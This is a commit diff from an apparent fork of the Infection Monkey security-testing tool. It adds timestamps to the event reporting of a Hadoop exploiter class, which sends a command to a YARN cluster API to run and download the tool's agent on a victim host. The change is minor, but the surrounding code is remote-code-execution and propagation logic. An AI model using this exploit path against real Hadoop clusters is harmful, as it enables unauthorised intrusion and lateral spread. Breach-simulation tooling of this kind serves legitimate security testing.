forked from p15670423/monkey
Agent: Stamp time before exploit executes
This commit is contained in:
parent
de5d365bb0
commit
76a3cb0ba0
|
@ -9,6 +9,7 @@ import logging
|
|||
import posixpath
|
||||
import random
|
||||
import string
|
||||
from time import time
|
||||
from typing import Tuple
|
||||
|
||||
import requests
|
||||
|
@ -66,8 +67,9 @@ class HadoopExploiter(WebRCE):
|
|||
self.host, str(monkey_path_on_victim), self.agent_binary_repository
|
||||
)
|
||||
|
||||
try:
|
||||
command = self._build_command(monkey_path_on_victim, http_path)
|
||||
stamp = time()
|
||||
try:
|
||||
|
||||
if self.exploit(self.vulnerable_urls[0], command):
|
||||
self.add_executed_cmd(command)
|
||||
|
@ -76,8 +78,8 @@ class HadoopExploiter(WebRCE):
|
|||
|
||||
except requests.RequestException as err:
|
||||
error_message = str(err)
|
||||
self._publish_exploitation_event(False, error_message=error_message)
|
||||
self._publish_propagation_event(False, error_message=error_message)
|
||||
self._publish_exploitation_event(stamp, False, error_message=error_message)
|
||||
self._publish_propagation_event(stamp, False, error_message=error_message)
|
||||
finally:
|
||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
@ -107,14 +109,15 @@ class HadoopExploiter(WebRCE):
|
|||
self._set_interrupted()
|
||||
return False
|
||||
|
||||
stamp = time()
|
||||
resp = requests.post(
|
||||
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
|
||||
)
|
||||
|
||||
success = resp.status_code == 202
|
||||
message = "" if success else f"Failed to exploit via {url}"
|
||||
self._publish_exploitation_event(success, error_message=message)
|
||||
self._publish_propagation_event(success, error_message=message)
|
||||
self._publish_exploitation_event(stamp, success, error_message=message)
|
||||
self._publish_propagation_event(stamp, success, error_message=message)
|
||||
return success
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
|
|
Loading…
Reference in New Issue